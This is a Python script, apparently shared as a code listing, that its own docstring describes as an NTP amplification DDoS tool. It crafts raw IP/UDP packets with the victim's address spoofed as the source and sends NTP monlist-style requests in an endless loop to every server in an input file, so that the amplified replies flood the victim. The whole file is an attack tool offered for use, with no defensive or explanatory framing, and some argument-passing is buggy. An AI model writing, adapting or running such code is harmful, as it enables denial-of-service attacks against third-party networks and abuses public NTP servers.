1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
|
from multiprocessing import Process
import socket
from sys import *
from struct import *
"""
(c) Alexander Pickering 2013-2016
With code from http://www.binarytides.com/
A DDOS attack that leverages NPT servers,
Requires an input file, with each ntp on a different line
"""
class targetOne():
def __init__(self, target, victim):
payload = b'\x17\x00\x03\x2a\x00\x00\x00\x00'
gid = 54321
s = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_RAW) #Create the socket
ipheader = pack('!BBHHHBBH4s4s',
85, #IHL version
0, #Type of service
0, #Total length, will automatically fill in correct lenghth
gid, #Global id of this packet
0, #Fragment offset
255, #Time to live
socket.IPPROTO_UDP, #Protocol
0, #Header checksum, will automatically fill
socket.inet_aton(victim), #Spoof the victim's ip as our own, so data gets sent there
socket.inet_aton(target)) #The NTP server
udpheader = pack('!HHHH',
0, #Source port
123, #Destination port for NTP
0, #Length, automatically filled in
0) #Checksum, filled in later
pseudoheader = pack('!4s4sBBH',
socket.inet_aton(victim), #Spoof source address
socket.inet_aton(target), #The NTP server
0, #Placeholder for length
socket.IPPROTO_UDP,
len(udpheader+payload)) #Length of the packet
brokepacket = pseudoheader + udpheader + payload #create an incorrect packet
check = self.checksum(brokepacket) #Get the checksum
udpheader = pack('!HHHH',
0,
123,
0,
check) #Re-create the udp packet with the correct checksum
packet = ipheader + udpheader + payload #The final packet to send
print("Sending packet:\n" + str(packet))
print("Attacking!!!\n press ctrl+c to stop")
while(True):
s.sendto(packet,(target,0)) #Send the packet
##Checksum function taken from http://www.binarytides.com/
def checksum(self, msg):
s = 0
for i in range(0,len(msg),2):
par1 = ord(chr(msg[i]))
par2 = ord(chr(msg[i+1]))
w=par1 + (par2 << 8)
s=s+w
s=(s>>16)+(s&0xffff);
s=s+(s>>16);
s=~s&0xffff
return s
class ntpspam():
def f(self, victim = None, filename = None):
if(victim == None):
victim = input("IP of victim:\n")
if(filename == None):
ntpfilename = input("Name of file containting ntp servers\n")
else:
ntpfilename = filename
ntpfile = open(ntpfilename, 'rb', buffering = 0)
done = False
ip = ''
returned = False
x = 0
processes = {}
while(not done):
char = ntpfile.read(1)
char = str(char)[2:-1]
if(char == '\\n' and returned):
print("useing ntp " + ip)
returned = False
p = Process(target = self.makeOne, args=(ip,))
p.start()
processes[x] = p
x += 1
ip = ''
elif(char == '\\r'):
returned = True
elif(not char == ''):
ip += char
else:
done = True
print("done,useing ntp " + ip)
returned = False
p = Process(target = self.makeOne, args=(ip,victim,))
p.start()
processes[x] = p
x += 1
ip = ''
ntpfile.close()
def makeOne(self, ip, victim):
one = targetOne(ip, victim)
if(__name__ == '__main__'):
try:
n = ntpspam()
n.f()
except Exception as e:
crash = open('crash.log', 'w')
crash.write(str(e))
crash.close()
|
